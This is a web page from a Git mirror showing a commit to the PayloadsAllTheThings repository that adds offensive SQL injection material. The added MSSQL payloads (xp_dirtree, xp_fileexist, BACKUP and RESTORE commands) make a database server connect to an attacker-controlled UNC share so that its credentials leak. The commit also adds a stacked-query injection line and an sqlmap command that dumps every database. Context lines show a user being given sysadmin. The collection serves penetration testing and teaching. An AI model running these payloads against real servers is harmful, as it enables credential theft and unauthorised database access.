gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-27 05:03:28 -08:00
Code Issues Packages Projects Releases Wiki Activity

DCOM exploitation and MSSQL CLR

Browse Source
This commit is contained in:
Swissky
2021-03-24 22:26:23 +01:00
parent bd2166027e
commit f6b9d63bf8
10 changed files with 296 additions and 10 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
SQL Injection/MSSQL Injection.md
View File

@@ -208,6 +208,21 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
```
```sql
xp_dirtree '\\attackerip\file'
xp_fileexist '\\attackerip\file'
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
RESTORE LABELONLY FROM DISK = '\\attackerip\file'
RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
```
## MSSQL Make user DBA (DB admin)
```sql
@@ -252,3 +267,4 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
* [SQL Server Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)

10
SQL Injection/README.md
View File

@@ -30,6 +30,7 @@ Attempting to manipulate SQL queries may have goals including:
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
* [SQLmap without SQL injection](#sqlmap-without-sql-injection)
* [Authentication bypass](#authentication-bypass)
* [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
* [Polyglot injection](#polyglot-injection-multicontext)
@@ -200,6 +201,7 @@ sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
### General tamper option and tamper's list
```powershell
@@ -267,6 +269,14 @@ tamper=name_of_the_tamper
|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
### SQLmap without SQL injection
You can use SQLmap to access a database via its port instead of a URL.
```ps1
sqlmap.py -d "mysql://user:pass@ip/database" --dump-all
```
## Authentication bypass
```sql